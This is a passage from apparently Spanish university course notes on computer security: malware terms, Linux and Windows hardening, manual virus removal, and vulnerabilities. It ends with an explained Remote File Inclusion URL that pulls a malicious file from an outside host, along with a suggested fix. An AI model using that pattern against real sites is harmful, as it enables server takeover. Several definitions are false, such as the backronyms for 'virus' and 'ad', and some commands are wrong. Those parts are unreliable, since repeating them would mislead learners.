desencriptado, aunque ambos son neologismos -anglicismos de los términos ingleses encrypt y decrypt-
todavía sin reconocimiento académico. Hay quien hace distinción entre "cifrado/descifrado" y
"encriptado/desencriptado" según esté hablando de criptografía simétrica o asimétrica, pero la mayoría
de los expertos en el mundo académico prefiere evitar ambos neologismos.

Véase también
Criptografía simétrica o convencional
Criptografía asimétrica o de clave pública
Criptografía de curva elíptica
Criptografía híbrida
Firma digital
Esteganografía
Criptoanálisis
Infraestructura de clave pública
Especificaciones PKCS
Atbash
Test de primalidad
Algoritmos
AES
RSA
DES / TripleDES
IDEA
TEA / XTEA
ARC4
DSA
ECDSA
MD5
ROT-13
Enigma
Base64
Protocolos
TLS
SSL
SET
OpenPGP
DSS
SSH
Aplicaciones
Software
o PGP
o GnuPG
o John the Ripper
Voto electrónico
Pagos electrónicos
o Transacciones seguras
o Monedero electrónico

____________________________________________________________________________________________________________________
UNdeC Página 79
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Consideraciones de software
Tener instalado en la máquina únicamente el software necesario reduce riesgos. Así mismo tener
controlado el software asegura la calidad de la procedencia del mismo (el software pirata o sin garantías
aumenta los riesgos). En todo caso un inventario de software proporciona un método correcto de
asegurar la reinstalación en caso de desastre. El software con métodos de instalación rápidos facilita
también la reinstalación en caso de contingencia.
Existe software que es famoso por la cantidad de agujeros de seguridad que introduce. Se pueden
buscar alternativas que proporcionen iguales funcionalidades pero permitiendo una seguridad extra.

Consideraciones de una red


Los puntos de entrada en la red son generalmente el correo, las páginas web y la entrada de ficheros
desde discos, o de ordenadores ajenos, como portátiles.
Mantener al máximo el número de recursos de red en sólo en modo lectura impide que ordenadores
infectados propaguen virus. En el mismo sentido se pueden reducir los permisos de los usuarios al
mínimo.
Se pueden centralizar los datos de forma que detectores de virus en modo batch puedan trabajar durante
el tiempo inactivo de las máquinas.
Controlar y monitorizar el acceso a Internet puede detectar, en fases de recuperación, cómo se ha
introducido el virus.

6.7. Algunas afirmaciones erróneas comunes acerca de la seguridad


Mi sistema no es importante para un cracker. Esta afirmación se basa en la idea de que no introducir
contraseñas seguras en una empresa no entraña riesgos pues ¿quién va a querer obtener
información mía?. Sin embargo, dado que los métodos de contagio se realizan por medio de
programas automáticos, desde unas máquinas a otras, estos no distinguen buenos de malos,
interesantes de no interesantes, etc. Por tanto abrir sistemas y dejarlos sin claves es facilitar la vida a
los virus.
Estoy protegido pues no abro archivos que no conozco. Esto es falso, pues existen múltiples formas
de contagio, además los programas realizan acciones sin la supervisión del usuario poniendo en
riesgo los sistemas.
Como tengo antivirus estoy protegido. En general los programas antivirus no son capaces de
detectar todas las posibles formas de contagio existentes, ni las nuevas que pudieran aparecer
conforme los ordenadores aumenten las capacidades de comunicación.
Como dispongo de un firewall no me contagio. Esto únicamente proporciona una limitada capacidad
de respuesta. Las formas de infectarse en una red son múltiples. Unas provienen directamente de
accesos al sistema (de lo que protege un firewall) y otras de conexiones que se realizan (de las que
no me protege). Emplear usuarios con altos privilegios para realizar conexiones puede entrañar
riesgos.

6.8. Organismos oficiales de seguridad informática


Existen organismos oficiales encargados de asegurar servicios de prevención de riesgos y asistencia a
los tratamientos de incidencias, tales como el CERT/CC (Computer Emergency Response Team
Coordination Center) del SEI (Software Engineering Institute) de la Carnegie Mellon University el cual es
un centro de alerta y reacción frente a los ataques informáticos, destinados a las empresas o
administradores, pero generalmente estas informaciones son accesibles a todo el mundo.

6.9. Véase también


Antivirus
Bluejacking
Biometría
Criptografía
Firewall
Ingeniería social
Precauciones recomendables al usar el correo electrónico

____________________________________________________________________________________________________________________
UNdeC Página 80
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Seguridad en Internet
Wifi

6.10. General
Terminología
Malware
Es la contracción de dos palabras: Malicious Software o software malicioso, esto es porque antes le
llamaban virus a todo y causaba algo de problemas. es todo software que cause daños a los ususario,
como perdida de datos, robo de contraseñas, etc.
Infección
Sucede cuando un software malicioso se ejecuta libremente en la computadora por primera vez, sin
importar de que tipo de malware sea.
Mutex
Los gusanos tienen la característica de que pueden ejecutarse varias copias de sí mismo en un mismo
ordenador, por ejemplo, aquellos que se copian en cada carpeta, y se abren con cada carpeta. Algunos
no desean eso y generan una regla que indica que solo una copia por equipo se debe ejecutar, que es
un MUTEX.
Lenguaje de programación
Es como fue programado el malware. Gracias a esto se sabe sobre que va a actuar el virus, o sus
limitantes. Sin importar sobre que lenguaje se ha escrito.
Spyware
"Spy software", a diferencia de los virus, no es su intención causar daño, sino enviar información privada
del usuario.
Adware
Ad software o software publicitario. A diferencia del spyware, este se limita a mandar publicidad que es
molesta, más que ser un programa aparte, es un modo de licencia: un programa que no es gratuito
puede ser más accesible si se regala, con la condición de recibir publicidad.
Virus
Significa "Archivos vitales del sistema bajo acoso", y si logísticamente, es un concepto aparte de los virus
biológicos, aunque son parecidos en el modo de infección, ya que este es un código insertado a un
archivo normal. Sus instrucciones son claras: busca otro de tu tipo y copiar en su contenido.
Gusanos
A diferencia de los virus, estos son aplicaciones que se copian a la PC y realizan su funcionamiento, este
va desde bloquear aplicaciones, o solo buscar más victimas. En sí se clasifican en los de correo
electrónico, que se mandan adjuntos a un mensaje, que explotan vulnerabilidades o que se copian por
páginas web.
Troyanos
Es casi difícil de explicar como funcionan, pues sus acciones varían. se llaman así porque engañan al
usuario.
Root Kit
Es lo último en intrusiones, se trata de programas que ocultan todo proceso que un cracker considere
como vital apara mantenerse en la PC, sea Linux o Windows, estos son unos dolores de cabeza, no son
sencillos de eliminar. wikipedia contiene información adicional sobre los Root Kit
Key Log
"Registro de teclas", son programas que registran todo lo que uno teclea, la información obtenida se
puede guardar o enviar inmediatamente, suponen un peligro al poder escribir contraseñas, direcciones
de correo electónico y páginas:
http://www.correo.com usuario@correo.z miguel
Phishing
Se trata de desviar a los usuarios de sus paginas de Log legítimas por falsas, así, wwww.hotmail.com a
http://145.15573.484/login. La diferencia es que una reenvia lo escrito.

____________________________________________________________________________________________________________________
UNdeC Página 81
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Hoax o bulo
Bulo es chisme, engaño, mentira, Hoax también. Son correos electrónicos que dicen "Reenvía esto! un
virus geneticamente modificado infecta máquinas!!!!"

Tecnología y el Malware
Introducción
Con el avance de las comunicaciones y tecnologías, también se avanza con la inseguridad. la PsP
portátil sufre de un virus que borra todo su OS, los teléfonos infectan centenares de gentes, un gusano
se expande por las memorias usb... todas estas historias tienen algo en común: La tecnología.

Tecnologías

Memorias USB

Las nuevas memorias USB carecen de protección contra escritura, por esto se pierden datos y se
infectan equipos. usbToy es un gusano que aprovecha dos tecnologías: la falta de protección y la
reproducción automática.
[*] Crea un archivo Autorun.inf, que indica al sistema que ejecute el archivo Toy.exe.
[*] El archivo Toy.exe se copia en el sistema, para ser más exacto, en la carpeta "Inicio", se oculta
manejando una API.
[*] Mientras esté en la memoria, busca unidades USB conectados y se copia con su autorun.

Ipod

El Ipod sufre del Olso (o Podloso), este infecta los archivos del Ipod y muestra un mensaje. Solo afecta
los Ipod con Linux, busca los archivos Elf y los infecta, impidiendo su ejecución.

Teléfonos Celulares

Los teléfonos con Bluetooth tienen la características de que si "perciben" otro, se comunican con él. Los
virus de Bluetooth se aprovechan de esto, y cualquier víctima que se acerque recibirá una invitación a
descargar el virus (enmascarado, claro). Si no se acepta descargarlo, el celular afectado volverá a
mandar el archivo. Un celular infectado puede mandar por mensajes multimedia el virus. Sus actividades
van desde sustituir las aplicaciones del celular por sí mismo, alterar configuraciones, mensajes, o llamar
a números de tarifas "Especiales" (4 dólares por minuto).

6.11. Linux
Lo Básico en Seguridad
Dominios de usuario
A diferencia de Windows, Linux separa los archivos del sistema de las cosas del Usuario, sólo un usuario
raíz o Root puede copiar archivos del sistema.
Paquetes.
Aquí no hay Firefoxsetup.exe, aquí hay firefoxbinary.tar.gz, y para instalar hay que
Desempaquetar:
tar -zxwf firefoxbinary.tar.z
Configurar
/firefox/configure.sh
Hacer
/firefox/make
Instalar
/firefox/install
Debido a esto, hay paquetes más completos, como los .deb de Debian, que se instalan más fácil, y los
de Red Hat, con los que sus gestores hacen todo el resto.
Música y Tarjetas gráficas.

____________________________________________________________________________________________________________________
UNdeC Página 82
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La música digital requiere codecs, y estos se descargan aparte, en cuando a las tarjetas, estas no tienen
controladores por defecto, y su instalación es muy difícil y causa muchos daños accidentales a los
equipos.
Conclusión
Linux es algo complicado, y de alguna manera, algo arcaico, por lo que muchos usuarios que emigren a
Linux, deberán de tomar precauciones con la manipulación de los archivos.

Es Necesario Antivirus?
¿Existen?
Sí. Pero son muy sencillos y de prueba, son menos de 70 y son experimentos para saber que tan seguro
es una distribución, pero existen, aunque no están tan diseminados como en Windows.
Antivirus
Uno de los antivirus en Linux es ClamAV, lo malo es que hace muchos falsos positivos, es decir, sus
reglas de detección son muy pobres, y termina detectando los de Windows.
Un antivirus puede ser omitido, siempre y cuando, se tenga las precauciones necesarias.

Súper Usuario
Principios
El super usuario es el encargado de instalar y desinstalar software, administrar hardware y demás tareas
que requieren delicadeza. Fue hecho para que los usuarios comunes no dañen el equipo.
Riesgos
Ciertas distribuciones tienen el Super Usuario (o Root) por default, es decir, en una máquina nueva, el
primer usuario será root, lo que conlleva a que desde el comienzo se hagan modificaciones riesgosas al
sistema.
Debido a que Linux no tiene siempre configurado las tarjetas de Vídeo, un usuario Root puede tratar de
hacerlo, esto es peligroso, en el sentido de que si falla, sólo podrán loggear en modo consola, además
de que modifica un archivo importante del sistema, restaurarlo requeriría recordar la linea... en fin, la
solución más rápida es reinstalar todo.
Prevenciones
La distribución de Ubuntu no tiene Root al inicio, pero usa SUDO, que otorga por 15 minutos el derecho
de Super usuario, desde hacer una línea de consola:
usuario$ sudo apt-get moo
password:
Hasta permitir que el administrador gráfico de archivos Nautilus sea Root
gksudo nautilus.
Al igual que este, otras distribuciones toman sus medidas para evitar el abuso de Root. Pero hay que
tener cuidado con su manejo y manejar con cuidado todo el sistema y evitar tocar o hacer tareas
administrativas, a menos que sea necesario.

Medidas de Seguridad
Seguridad de alto espectro
Debido a que Linux es un punto fuerte en lo relacionado a seguridad, es difícil que sufra daños, aunque
hay que tomar lo siguiente en cuenta.
Administración fuera de la carpeta /home/
Cualquier usuario que haya emigrado a Linux debe de saber que cualquier edición de los archivos del
sistema puede ser peligroso y dejar al sistema inestable, o igual, si uno no sabe manejar las
actualizaciones del servidor gráfico, puede causar un colapso, que se puede considerar "grave" en
cuanto a que se tendrá que manejar con la línea de comando.
Configuración de drivers, actualizaciones y upgrades
Debido a que la mayoría de los controladores son para windows en algunas partes del hardware, en
Linux requiere la edición de archivos de configuraciones, si no se escriben correctamente, habrá
problemas... por lo que es mejor hacer unas cuantas líneas de comando, algo parecido a esto:
cp /sys/block/dm-0/uevent /home/usuario/backup

____________________________________________________________________________________________________________________
UNdeC Página 83
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

En este caso, hemos copiado este archivo del sistema a nuestra carpeta personal, luego, haremos
nuestra edición, y si llegara haber un error, bastarías con invertir las líneas anteriores a:
cp /home/usuario/backup/uevent /sys/block/dm-0
Suponiendo que ya han iniciado como usuario ROOT.
Actualizaciones
Todos los sistemas están en constante desarrollo, pero una mala actualización puede causar una
desconfiguración el el equipo, pero a la vez, es recomendable actualizar periódicamente el sistema.
Upgrades
Normalmente, los Upgrades son ascensos de versiones, es decir, una actualización del Programa
versión 1.1 lo convierte en 1.2 o 1.1.2, en cambio, el ubgrade hace al programa versión 2.0.
En Linux un Upgrade debe ser con cuidado, pues se corre el riesgo de echar a perder el equipo, ya que
algunos Upgrades desactivan los módulos (los encargados de la visión gráfica, impresoras y drivers,
seguridad, políticas de los programas...). De igual forma, un upgrade es bueno cuando se deja de
mantener una gran cantidad de los programas.
Firefox
Uno de los problemas en algunas distros es que tienen Firefox 1.5, hay una opción y es sustituir el la
carpeta Firefox por la de 2.0, pero hay riesgo de que no sirva, es mejor conseguir Scripts, además, si se
desinstala firefox desde un administrador de aplicaciones avanzado, se corre el riesgo de llevarse
también otras utilidades.

6.12. Windows
Introducción.
La seguridad informática es un tema que mucha gente no le da la importancia que realmente tiene.
Mantener un sistema informático o una red informática libre de intrusiones no es tarea fácil. Hay que
actuar siempre con precaución y siguiendo unas normas básicas para evitar daños.
Recuerde que la seguridad es inversamente proporcional a la comodidad. Si desea un sistema seguro
deberá esforzarse por ello, emplear contraseñas fuertes y diferentes y seguir todo un procedimiento para
mantener el sistema.
¿Qué puede pasar?
El acceso no autorizado a una red informática o a los equipos que en ella se encuentran puede
ocasionar graves problemas.
Uno de las posibles consecuencias de una intrusión es la pérdida de datos. Es un hecho frecuente y
ocasiona muchos trastornos, sobretodo si no estamos al día de las copias de seguridad. Y aunque
estemos al día, no siempre es posible recuperar la totalidad de los datos.
Otro de los problemas más dañinos es el robo de información sensible y confidencial. La divulgación de
la información que posee una empresa sobre sus clientes puede acarrear demandas millonarias contra la
empresa.

Como Saber si estoy infectado


Actualmente, los virus ya no son tan fáciles de detectar, ni tan fáciles de editar, en la época de los 80's,
uno reconocía un virus porque no podías abrir tus archivos, te aparecían mensajes:
******************************************
***********I N F E C T A D O**************
******************************************
O si tenías dinero, con un editor veías el código de tu archivo y encontrabas su firma "YOUR PC IS
INFECTED"... etc ...etc.
Pero esto fué significando que los usuario decían "Ya estoy infectado... voy a borrarlo", por lo que fueron
perdiendo fuerza, y debieron ser menos notorios.
Con el desarrollo de Windows, las cosas casi volvieron a ser iguales, nacieron los Virus de Macro que
infectaban las plantillas de office, llegaban a formatear incluso los discos, agraban notas a los
documentos y eran igual de difíciles de borrar, pues todos los archivos de Word abiertos eran infectados,
uno borraba la plantilla de 1 mega de tamaño y se creaba una limpia... que de nuevo era infectada.
Al mismo tiempo se desarrolló el internet, otro camino más para los virus, surgieron otras "razas" de virus
que infectabn documentos de texto y a la vez mandaban correo con Outlook, los troyanos, y

____________________________________________________________________________________________________________________
UNdeC Página 84
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

recientemente el Spyware tenían vestigios gráficos (pantallas) y de sellos de manufactura "Hecho en


Algolandia por hacker mig".
El Sasser y MyDoom en el 2004 marcan casi la nueva era de virus para XP, introduciéndose por
agujeros de seguridad y sobrecargando las redes.
Ya en el 2006, se desarrolló otra amenaza más peligrosa que es el phishing o pesca, que es el robo de
contraseñas, no necesariamente debe de ser por aplicaciones, desde una página mal tecleada a una
vulnerabilidad en el navegador.
Con todo esto, revisar una computadora requiere mucha dedicación.
Detección
Primero: Mi máquina se pone muy lenta, se ha reiniciado o me sacó una pantalla espantosa.
¿He perdido archivos?
Lo importante, ¿se me han desaparecido mis documentos?
Mi antivirus ya no existe
"Buscando programa Antivir.exe" me aparece cuando trato de correr mi antivirus, no están sus carpetas
ni se ha actualizado
Ya no puedo abrir ciertos tipos de archivos
Pues eso, un día escuchas música y hoy no, o de repente no puedes abrir tus aplicaciones y al
buscarlas, no existen.
No puedo ejecutar aplicaciones del sistema
ALT+CONTROL+Supr no responde, ScanDisk o algún parecido no responde, etc.
Cada vez que inserto una memoria externa como un disquette, aparece un archivo que no he
colocado
La memoria de mis discos se reduce cuando los concto, aparecen aplicaciones. El floppy revisa cada
cierto tiempo la existencia de disquettes y si hay uno escribe algo en él.
Tengo un nuevo antivirus o mata spyware!!!
Eso es otra cosa, vease Spyware.
Me aparece un mensaje cuando hago algo
Ya sea uno con propaganda con protestas o del tipo "Acerca de"
He recibido correo con aplicaciónes
Uno recibe un correo con un ícono conocido, pero con extensión distinta y que no hace nada de lo que
se promete en el mensaje.
Mis archivos de office cambian
Obtienen comentarios de desconocidos, su formato cambia aleatoriamente o se firman por alguien que
yo no soy.
Aparecen ficheros ajenos
Archivos con nombres que desconozco y con extensiones .pif o .scr.
Imágenes feas
Imágenes que te asustan, nada más.
El messenger manda un mensaje a todos mis conectados, e incluso bloquea mi ventana
Curiosamente, un amigo mío me mandó el mismo mensaje.
Si se siente descrito en una pregunta, considérese infectado.

Desinstalando Virus sin Antivirus


Para borrar un virus 100% se requiere:
Un editor de registro
Un administrador de procesos.
Un antivirus.

Editor de registro.
Actualmente hay virus que ejecutan un script que impide el uso del "regedit", para identificarlo, al ejecutar
"regedit" aparecerá un mensaje:
El administrador ha desabilitado la edición del registro

____________________________________________________________________________________________________________________
UNdeC Página 85
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

O simplemente, unos cuantos segundos después, este se cierra, o se cambia de lugar.


Por esa razón, hay que buscar un editor optativo, RegAliser es uno de estos. Este editor lo usaremos
para borrar las entradas generadas por el virus.
Un disco de instalación de windows, todos los drivers correspondientes del hardware y sus discos de
arranque, igual copias de seguridad, si acaso se dañara el Sistema.

Administrador de procesos
De igual forma, los virus pueden deshabilitar el administrador de procesos de Windows, casi de la misma
forma que del editor del registro, por lo que un administrador de procesos externo será necesario para
cerrar al virus y continuar con la limpieza.
Un antivirus
Esto es para lo último, para buscar alguna resistencia del virus e incluso reparar sus daños, esto va por
su cuenta.

Procedimiento
Identificación
¿Que es lo va a combatir?, si ya sabe que está infectado por los mensajes del virus o por los daños que
hace, o simplemente porque se copia a cualquier disquette-memoria, copie el virus, busque un
ordenador con un Antivirus actualizado y, sin ejecutar el virus, introduzca la memoria y ordénele al
antivirus que lo analize, este puede decirle que es. ¿Y si no encuentra nada?, Mande una copia a un
grupo de antivirus para analizar la amenaza... y luego continue con los pasos siguientes.
Documentación
Suponiendo que su infección ya ha sido reconocida, busque en una enciclopedia los daños que ocaciona
o sus actividades, y tome sus medidas.
Preparación
Busque un ordenador limpio y bajese todos sus programas nombrados anteriormente (editor de registro,
de procesos y antivirus), si su máquina infectada no tiene conexión a internet, descargue también las
definiciones más recientes de su antivirus, si el virus modifica las políticas del sistema, busque en la
documentación las claves de registro originales o búsquelas en un equipo limpio, y escriba en el block de
notas las claves correctas:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
Debido a que cada virus es único, (excepto sus variantes A, B, C, D, [...] AZ, BI...), no se incluye todas
las claves de registro que pueden ser modificadas, vea la documentación del virus, algunas páginas ya
tienen los .reg hechos para reparar el registro. Como vemos, este es un ejemplo de lo que contiene un
archivo *.reg, guardelo con un nombre especial (pero que no contenga las palabras vir, antivir), como
"registro reparado.reg".
Grabe en un disco todos los programas, tratando de no ponerle un nombre como "Antivirus" o que
contenga una subcarpeta con ese nombre.
Limpieza del equipo
Como algunos virus están vigilando los procesos del sistema, estos desactivan algún proceso con un
nombre de una marca o que diga "antivir" o "vir", por lo que cualquier capeta o programa será cerrado, si
copia la instalación del antivirus ahora, el Virus puede impedir su ejecución y hasta borrarlo, por lo que
usaremos el adimistrador de tareas nuestro.
Breve diagnóstico
Si su virus es uno que "Modifica el registro para ejecutarse cada vez que uno abre un exe, pif, src", y
tiene las claves de registro origninales, pero impide la combinación de este, así que vamos al opciones
de carpeta en el explorador de windows, luego seleccionamos "Tipos de archivos registrados" y
buscamos la extensión REG. La editamos y editamos el campo "Combinar", e introducimos
regedit.exe "%1"
Luego buscamos nuestras claves de registro y hacemos click con el botón derecho, y hacemos click en
"Combinar", nos preguntará si de verdad queremos hacer eso, decimos que sí y esperamos... Las claves
modificadas serán restauradas, vamos al paso dos.

____________________________________________________________________________________________________________________
UNdeC Página 86
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Finalización de procesos
Instalamos nuestro administrador de procesos, y matamos aquellos que correspondan al virus, y
vayamos al registro.
Edición del registro
Instalamos nuestro editor de registro y borramos las claves de arranque del virus, que pueden estar en
KHLM/Software/Microsoft/Windows/Current Version/Run, igual buscamos que no se este poniendo el
programa el título de Servicio del sistema, buscando en las claves "Services", y eliminando las claves
correspondientes.
Renicia el equipo
Aquí veremos si no hay nada que siga llamando al Virus, y para que no arranque nada suyo, si no se
hubiera matado antes.
Vuelve a arrancar el administrador de tareas
Busca cualquier actividad del virus, y si estuviera, mátala.
Borrado
Borra todos los archivos del virus, y reinicia el quipo.
Reinicio
Repetimos lo del administrador de tareas, y corremor el antivirus.
Antivirus
Si bien en el título afirma que se pueden borrar virus sin antivirus, hay cosas que estos se reservan en
las definiciones, o si el virus se pone nombre aleatorio, este lo busca, y nos permite borrar todo vestigio
de el.
Lo instalamos, si no contamos con internet, desde nuestro disco le isntalamos sus actualizaciones,
analizamos el sistema y esperamos a ver los resultados. Posiblemente y a no detecte nada, o avise de
algún archivo infectado, aquí decidiremos si borrarlo o guardarlo en cuarentena, aunque si declara que
es una aplicación del gusano, puede borrarse sin nuestra orden.
Vectores
Son los medios de donde se puede uno infectar, ahora es cuestion de analizar todo lo que hizo contacto
con la máquina infectada.
Terminado
Nadie dijo que quitar virus en Windows fuera fácil, y si bien ya tenemos un equipo limpio, es
recomendable mantener nuestro antivirus actualizado, para evitar cualquier infección.

Usuario
Usuario: Primer riesgo
Sin importar que SO es, cualquier usuario con derechos de administrador... puede arruinar un equipo,
pero Windows es el que más daño sufre, pues un usuario con derechos de administrador puede borrar
todo su disco duro.
Debido a esto, algunos sistemas (entre ellos Linux) hacen una especie de "lote" del usuario: La carpeta
Home, de ella, para afuera, el usuario no puede modificar anda, a menos que logeec como Root (o super
usuario)... y ahí comienzan los problemas:
Un usuario puede dañar el sistema, e igual, aunque lo repare parcialmente, puede quedar inestable.
Puede hacer al sistema inarrancable, o bloquear sus herramientas.
De cualquier forma, incluso en Windows, han tomado medidas para cuidar de eso, pero eso no quita que
un usuario con poder dañe el sistema voluntaria o accidentalmente.
Conclusión
Si vamos a hacer algo que sabemos poco, o apenas iniciamos, y tiene que ver con modificación o
eliminación de programas, es mejor pedírselo a alguien o no hacer, además de tomar nuestras medidas
de precaución, tales como la copia de seguridad.

Ad-Ware y Spy-Ware
Diferencias
El spyware es una derivación de los troyanos, y este se encarga de realizar varias clases de
seguimientos al ususario (que páginas ve, qué archivos contiene su equipo, los programas), e incluso
llegan a capturar infromación privada, estos se instalan de dos maneras:

____________________________________________________________________________________________________________________
UNdeC Página 87
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Licencias
El software compartido o Shareware completo, no se paga solo, necesita un "patrocinador", y este se
intala junto con el programa, esto se lee en sus CLUF's (Contrato de Licencia Usuario Final), en el que
se dice "Este software gratuito recopilará datos personales y no se permite su libre distribución sin este".
Estafas y Exploits.
Una segunta vías es por páginas irregulares que contiene bots que priemero se infiltran en el sistema por
una vulnerabilidad, ya sea por ActiveX o cualquier otro, y después se encarga de descargar el spyware.
Algunos Spyware son simplemente animaciones Flash como el SpySheriff o SpyWare No! en el que
simplemente mueven una animación de análisis, te pasan todas tus carpetas, y ponen nombres y
ubicaciones de archivos con fondo rojo para decir que uno está infectado, luego, en la desinfección, se le
pide su tarjeta de crédito.
Ad-ware
Uno diría que "Ad" es agregado, pero es todo lo contravio, significa "Aviso" y este software entra por la
licencia del software Usuario Final, es el que manda pop-ups y el que pone el anuncio en la ventana del
programa.
Eliminación
Sencillo, desinstale el programa, en caso contrario, si usa una herramienta de eliminación, y usa su
programa, puede decirle "No se encuentra el archivo *.*" o alguno parecido, si ya lo hizo y de todas
maneras se quedaron, es recomendable usar la herramienta de eliminación.

Acciones comunes de los malware


Finaliza los antivirus y firewalls, además de que se cierran las herramientas de eliminación de virus,
por cuestiones obvias. Estos tampoco se inician.
Mensajes o aplicaciones desconocidas en el panel de tareas, se desactivan las herramientas del
registro y el TaskMonitor (taskmon)
Reinicios del equipo.
Imágenes, pantallas y pérdidas de archivos, algunos sitios de internet se desvían o no se accede
correctamente a ellos.

Malware
Es técnicamente todo programa que compromete los datos del usuario o daña el sistema operativo del
computador, este se divide en:
Virus
Si bien su nombre no tiene que ver con los virus biológicos (uno significa "Archivos del Sistema Bajo
Acoso" y el otro "veneno" en latín) hacen casi exactamente lo mismo: inserta su código a un archivo
específico que al ejecutarse busca otros archivos que infectar.
Gusano
Estos a diferencia de los virus, son aplicaciones que se copian, e incluso poseen programas de
instalacion, como UPX
Troyano
Casi idéntico que el gusano, pero este engaña al usuario, algunos funcionan como cualquier programa
(v. g. un procesador de textos) pero a la vez cumplen su maldad.
Spyware
Parecido al troyano en cuanto a la instalación, pero se encarga de mandar información de la víctima.
jokes
En español: bromas, son solo bromas, finjen dañar el equipo pero es muy molesto para los usuarios.
Root Kit
Permiten ocultar cualquier cosa: procesos, usuarios, archivos. Son difíciles de detectar cuando se
ejecutan, y solo se detectan accediendo al disco desde otro sistema operativo. Modifican muchos
archivos del sistema, y sus detectores son algo mediocres, ya que solo ven las diferencias de los
sistemas operativos comparando uno saludable, y uno actual.
Banker y Bancos

____________________________________________________________________________________________________________________
UNdeC Página 88
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Son dos troyanos que tiene la cualidad de que al detectar una página de banca en linea, falsifica su
página y roba los datos. Durante la redacción de estas lineas, un ladrón de cuentas llamado KardPhiser
apareció: Este finge ser un sistema de activación de Windows XP, y entre las preguntas, figura los
números de tarjeta de crédito...
Stealth
Era una vieja tecnología de los virus MS-dos para burlar los antivirus.
Polimorfismo
Se trata de como un virus cambia su código de detección.

Métodos Antidetección
Los virus están en constante desarrollo para burlar a los antivirus. Esto de debe diversas causas, como:
No están detectados en las definiciones
Han borrado al antivirus o iniciaron antes que este.
Tecnicas que no conoce el antivirus.
Detección de Virus
Un método normal es analizar el virus y copiar una frase que lo reconozca, por decirlo así, se explicaría
así:
<inicia virus "Bla-bla.g">
blabla 01154 Af
</termina virus Bla-bla.g>
La máquina va a buscar en los archivos esta cadena, pero si desarrollan el Bla-bla.h, bastaría con que
dijera Eg y no Af para que no fuera reconocido.
Lso virus actuales aprovechan esto para desactivar los antivirus, y una vez hecho esto, la instalación de
un antivirus actualizado se dificulta mucho mas.
Tunnelling
Casi es lo descrito anteriormente, es el sobrepasado del antivirus.
Stealth
Eso era en el Ms-dos, se trataba de la encriptación del virus.
Rootkit
Es una extraña herramienta que oculta todos los dominios del virus, archivos, registros, todo
secretamente, ya hay programas que los borran, pero es lo más usado actualmente.

Vulnerabilidades
Son errores que permiten realizar desde afuera actos sin permiso del administrador del equipo, incluso
se puede suplantar al usuario, actualmente, ya hay muchas amenazas que tratan de acceder
remotamente a los ordenadores, ya sea para hacerlos servidores ilegales de Spam o para robar
información, de los agujeros más famosos está el LSASS y el de SVSHOST, de los cuales el Sasser y
Blaster se diseminaron rápidamente.
¿Cómo evitarlas?
Actualice o cheque las actualizaciones cada cierto tiempo, pues eso permite casi adelantarse a cualquier
peligro que se aproveche de la vulnerabilidad.
¿Como las explotan?
Los hackers analizan lo que repara el parche, y luego generan su código arbitrario apra explotarlo,
pensando que habrá poca gente que se actualice.
¿Qué consecuencias traen?
Simplifican un ataque, permitiendo a los hackers obtener más permisos en el equipo víctima y poder
usarlo al libre albedrío, o el sistema puede ejecutar automáticamente códigos maliciosos, abrir puertos, o
en algunos casos es el almacenaciemto incorrecto de datos privados, como contraseñas. Un ejemplo es
el Remote File Inclusión;
Remote File Inclusion, su traducción es Inclusión de Archivo Remota. Esta es una vulnerabilidad
en la programación web. Puede ser una de las vulnerabilidades más críticas. Esta consiste en
utilizar un código maligno almacenado en un host remoto y ejecutarlo en el servidor de la víctima.

____________________________________________________________________________________________________________________
UNdeC Página 89
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Un ejemplo de una URL sería:


http://www.webvulnerable.com/index.php?pagina=http://www.codigos.com/maligno.txt
De esta manera el host "webvulnerable.com" ejecutaría el archivo que se encuentra en
"codigos.com", este archivo puede contener un sistema de administración de archivos, de esta
manera el atacante podrá ejecutar acciones en el servidor ajeno. Esta vulnerabilidad se
encuentra al utilizar un include en un querystring. index.php?pagina= Esto se podría solucionar
utilizando un código que al detectar que "pagina=http://*" automaticamente se muestre la página
principal. O bien no utilizar este tipo de sistemas y simplemente usar links completos. Esta
vulnerabilidad afecta a gran parte de los sitios. Se podría considerar como una vulnerabilidad de
riesgo crítico.

____________________________________________________________________________________________________________________
UNdeC Página 90
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

7. PROTOCOLOS DE TRANSMICION
7.1. Resumen.
Para el desarrollo de Frame Relay, se tomo como base el modo de conmutación de paquetes X-25 para
la transmisión de datos no susceptibles a la latencia de la red, con los avances en el desarrollo de los
medios de transmisión y como una mejora de X-25 se desarrollo Frame Relay. Con el tiempo, la
tendencia fue crear una red universal para el transporte de cualquier tipo de datos, desarrollándose ATM,
el cual integra la transmisión de voz, datos y vídeo, entonces se encontró la necesidad de desarrollar
compatibilidades entre las redes existentes y los nuevos desarrollos en ATM, por su parte Frame Relay
logro grandes avances en la transmisión de voz y videos. En este artículo se analiza la necesidad de
implementar o migrar a una red ATM, o si se puede, lograr una coexistencia.

7.2. Introducción.
Actualmente existe la tendencia en cuanto a tecnología se refiere de Adquirir los equipos y servicios mas
recientes que se ofrezcan en el mercado, lo ultimo en tecnología para estar a la vanguardia, sin pensar
en los efectos secundarios principalmente económicos que acarrea adquirir una tecnología, sin evaluar
previamente las ventajas y desventajas y la función especifica para lo cual se creo dicha tecnología, se
debe prestar atención a todas las opciones y evaluar realmente nuestras necesidades. A continuación
describimos dos de los modos de transferencia mas importantes y utilizados en redes de comunicación
como son ATM y Frame Relay, aquí analizaremos un poco las ventajas y desventajas de cada tecnología
y la orientación en el momento de su creación, así como el desarrollo en los últimos años para crear un
red universal e integrar todas las tecnologías.

7.3. Que es Frame Relay ?


Es un protocolo de transporte, orientado a la tecnología de conmutación de paquetes con velocidades
